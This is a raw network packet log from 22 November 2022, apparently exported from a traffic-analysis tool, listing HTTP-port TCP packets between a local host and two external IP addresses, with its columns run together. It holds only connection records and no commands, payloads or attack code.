                                                                                Nov 22, 2022 05:10:22.478005886 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.478063107 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.478081942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.478178978 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.478233099 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.478251934 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.478341103 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.478401899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.478457928 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.478523970 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.478657007 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.480074883 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.601094961 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:22.626300097 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626341105 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626357079 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626393080 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.626401901 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626461029 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.626487017 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626559973 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626642942 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.626656055 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626760960 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626812935 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.626841068 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.626964092 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.627015114 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.627784967 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.627892017 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.627945900 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.628012896 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628041029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628093004 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.628334045 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628402948 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628451109 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.628524065 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628602982 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628688097 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628703117 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.628808975 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628874063 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.628896952 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.628967047 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629020929 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.629086971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629113913 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629177094 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.629249096 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629286051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629400015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629451036 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.629520893 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629590988 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629683971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629733086 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.629805088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629843950 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.629894972 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.629925966 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630038977 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630096912 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.630130053 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630244970 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630300045 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630300045 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.630393982 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630462885 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630470037 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.630563974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630613089 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.630683899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630763054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630795002 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630830050 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.630928040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.630985975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.631014109 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631139040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631191969 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.631241083 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631297112 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631344080 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.631405115 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631465912 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631567001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631676912 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.631683111 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631746054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631797075 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.631858110 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.631972075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.632026911 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.632038116 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.632160902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.632219076 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.632224083 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.632285118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.632358074 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.632389069 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.633735895 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.633800030 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.633865118 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.706423044 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:22.778712988 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780472040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780493021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780538082 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780555964 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.780611992 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780734062 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780785084 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.780813932 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780896902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.780951023 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.781014919 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.781091928 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.781137943 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.781215906 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.781536102 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.781663895 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.781670094 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.781718016 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.781802893 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.781817913 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782062054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782119036 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.782160044 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782366991 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782423019 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.782444000 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782560110 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782607079 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.782618046 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782702923 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782756090 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.782813072 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782910109 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782924891 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.782958031 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.923371077 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:22.923434019 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:23.084614992 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:23.186791897 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:23.364623070 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:23.537180901 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:23.643862009 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:23.715482950 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:23.716557980 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:23.895142078 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:23.896810055 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:24.074578047 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:24.223095894 CET804917934.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:24.426420927 CET4917980192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:10:24.480160952 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:24.480237961 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.098211050 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.252561092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.252671957 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.252870083 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.406971931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.407993078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408050060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408104897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408124924 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.408175945 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408215046 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408236980 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.408278942 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408319950 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.408338070 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408379078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408425093 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408437014 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.408560038 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.408610106 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.562733889 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.562824965 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.562870026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.562917948 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.562975883 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563015938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563034058 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.563075066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563112974 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563136101 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.563175917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563215971 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563255072 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563271999 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.563309908 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563359022 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.563457012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563497066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.563553095 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.717637062 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717700958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717742920 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717782021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717823029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717850924 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.717899084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717938900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717986107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.717998028 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.718038082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718082905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718096972 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.718271017 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718312979 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718354940 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.718374968 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718415022 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718482018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.718519926 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718625069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718696117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.718751907 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.718832970 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872350931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872461081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872505903 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872551918 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872622967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872646093 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.872683048 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.872734070 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872781038 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872792959 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.872831106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872878075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872889042 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.872927904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872975111 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.872987986 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.873115063 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873155117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873265982 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873297930 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.873363018 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873464108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873502970 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873522043 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.873644114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873686075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873749018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.873809099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873850107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873925924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.873977900 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:28.874073982 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.874124050 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:28.874325991 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.027240992 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027303934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027347088 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027376890 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.027443886 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027494907 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.027528048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027569056 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027616024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027628899 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.027669907 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027715921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027729034 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.027767897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027812958 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.027908087 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.027947903 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028004885 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.028074980 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028114080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028170109 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.028213024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028254986 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028305054 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.028346062 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028476954 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028549910 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.028605938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028647900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028700113 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.028742075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028815985 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028879881 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.028938055 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.028990984 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029081106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029141903 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.029192924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029233932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029287100 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.029337883 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029464960 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029527903 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.029589891 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029630899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029720068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029767036 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.029855967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029896975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.029917955 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.181888103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.181996107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182018042 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.182089090 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182130098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182152033 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.182213068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182275057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182323933 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182349920 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.182424068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182476997 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182493925 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.182540894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182600021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182615042 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.182655096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182712078 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.182823896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.182944059 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183010101 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183023930 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.183092117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183154106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183224916 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.183316946 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183362961 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183420897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183485985 CET8049180183.78.168.24192.168.2.22
